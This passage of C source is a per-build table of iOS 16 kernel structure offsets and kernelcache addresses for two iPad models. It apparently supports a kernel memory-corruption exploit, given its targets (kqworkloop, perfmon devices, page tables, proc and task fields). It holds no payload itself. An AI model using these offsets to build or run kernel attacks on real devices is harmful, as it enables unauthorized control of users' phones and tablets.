._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a765208, .kernelcache__gPhysBase = 0xfffffff007997fc0, .kernelcache__gPhysSize = 0xfffffff007997fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007996198, .kernelcache__perfmon_devices = 0xfffffff00a7a3520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9210, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7a2990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7a2988, .kernelcache__vn_kqfilter = 0xfffffff008015ae0, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a765208, .kernelcache__gPhysBase = 0xfffffff007997fc0, .kernelcache__gPhysSize = 0xfffffff007997fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007996198, .kernelcache__perfmon_devices = 0xfffffff00a7a3520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9210, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7a2990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7a2988, .kernelcache__vn_kqfilter = 0xfffffff008015ae0, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a76d208, .kernelcache__gPhysBase = 0xfffffff007998100, .kernelcache__gPhysSize = 0xfffffff007998100 + 8, .kernelcache__gVirtBase = 0xfffffff0079962d8, .kernelcache__perfmon_devices = 0xfffffff00a7ab520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9480, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7aa990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7aa988, .kernelcache__vn_kqfilter = 0xfffffff008015fe8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a819a30, .kernelcache__gPhysBase = 0xfffffff0079b02a8, .kernelcache__gPhysSize = 0xfffffff0079b02a8 + 8, .kernelcache__gVirtBase = 0xfffffff0079ae460, .kernelcache__perfmon_devices = 0xfffffff00a859550, .kernelcache__perfmon_dev_open = 0xfffffff007fedb9c, .kernelcache__ptov_table = 0xfffffff0079639c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a858910, .kernelcache__vm_pages = 0xfffffff007960110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007962970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a858908, .kernelcache__vn_kqfilter = 0xfffffff00803a0b8, }, // iPad Air 4th Wifi// // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d1190, .kernelcache__gPhysBase = 0xfffffff00783c0c8, .kernelcache__gPhysSize = 0xfffffff00783c0c8 + 8, .kernelcache__gVirtBase = 0xfffffff00783a2a8, .kernelcache__perfmon_devices = 0xfffffff00a40c3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef41c4, .kernelcache__ptov_table = 0xfffffff0077ef378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a40b800, .kernelcache__vm_pages = 0xfffffff0077ec090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a40b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f46780, }, //iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3dd190, .kernelcache__gPhysBase = 0xfffffff00783c1b0, .kernelcache__gPhysSize = 0xfffffff00783c1b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783a390, .kernelcache__perfmon_devices = 0xfffffff00a4183b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef80f4, .kernelcache__ptov_table = 0xfffffff0077ef3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a417800, .kernelcache__vm_pages = 0xfffffff0077ec0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4177f8, .kernelcache__vn_kqfilter = 0xfffffff007f4a6a0, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3dd190, .kernelcache__gPhysBase = 0xfffffff00783c1b0, .kernelcache__gPhysSize = 0xfffffff00783c1b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783a390, .kernelcache__perfmon_devices = 0xfffffff00a4183b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef80f4, .kernelcache__ptov_table = 0xfffffff0077ef3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a417800, .kernelcache__vm_pages = 0xfffffff0077ec0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4177f8, .kernelcache__vn_kqfilter = 0xfffffff007f4a6a0, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E246", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a481208, .kernelcache__gPhysBase = 0xfffffff007917fc0, .kernelcache__gPhysSize = 0xfffffff007917fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007916198, .kernelcache__perfmon_devices = 0xfffffff00a4bf520, .kernelcache__perfmon_dev_open = 0xfffffff007f0864c, .kernelcache__ptov_table = 0xfffffff0078cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4be990, .kernelcache__vm_pages = 0xfffffff0078c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4be988, .kernelcache__vn_kqfilter = 0xfffffff007f57538, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a481208, .kernelcache__gPhysBase = 0xfffffff007917fc0, .kernelcache__gPhysSize = 0xfffffff007917fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007916198, .kernelcache__perfmon_devices = 0xfffffff00a4bf520, .kernelcache__perfmon_dev_open = 0xfffffff007f0864c, .kernelcache__ptov_table = 0xfffffff0078cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4be990, .kernelcache__vm_pages = 0xfffffff0078c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4be988, .kernelcache__vn_kqfilter = 0xfffffff007f57538, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 